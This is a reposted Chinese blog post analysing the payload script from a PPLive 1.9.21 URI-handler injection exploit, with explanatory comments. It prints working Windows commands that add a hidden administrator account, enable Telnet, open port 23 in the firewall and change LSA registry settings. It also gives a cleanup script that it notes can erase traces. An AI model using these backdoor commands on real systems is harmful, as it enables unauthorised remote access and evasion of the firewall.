一个开Telnet服务的脚本的分析(原来是这么给防火墙开洞的)

今天看 PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection 这个漏洞,又学到一个命令:netsh firewall add portopening ...

以前就在想BC和eMule是怎么在Windows防火墙上打开监听端口的,今天算是如愿以偿的见到了。PPLive 1.9.21 这个漏洞注入的远程DLL,是一个简单的脚本,整理一下就是这样:

 1  cmd   / net  user abc abc123456  / add
 2  cmd   / net  localgroup Administrators abc  / add
 3  cmd   / c sc config TlntSvr  start =  auto
 4  cmd   / net   start  TlntSvr
 5  cmd   / netsh firewall add portopening tcp 23 sh
 6  cmd   / echo  REGEDIT4  >  sh . reg
 7  cmd   / echo  [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Lsa]  >>  sh . reg
 8  cmd   / echo   \ " forceguest\ " = dword: 00000000   >>  sh . reg
 9  cmd   / c regedit  / S sh . reg
10  cmd   / del  sh . reg

 

前两条给系统加个名为abc的管理员,
3-4行打开Telnet服务并设置其自动运行,
第5行就是要点了,将tcp的23(Telnet)端口的监听给放行,于是防火墙没问题了
6-10是输出一个reg文件,关闭简单文件共享(好像要不要无所谓了)

这样 telnet 127.0.0.1,输入abc 123456就可以顺利进入了,防火墙也没提示

(观众:废话这多还只开个Telnet,砸死他!...要是服务器,还真不如开3389)

 

恢复用脚本,当然也可以用于清理痕迹:

cmd   / net  user abc  / delete
cmd   / net  stop TlntSvr
cmd   / c sc config TlntSvr  start =  disabled
cmd   / c sc config TlntSvr displayname =   " Telnet "   start =  disabled
cmd   / c netsh firewall delete portopening tcp  23

转载于:https://www.cnblogs.com/bits/archive/2009/03/17/exploits-batch_opentelnet.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值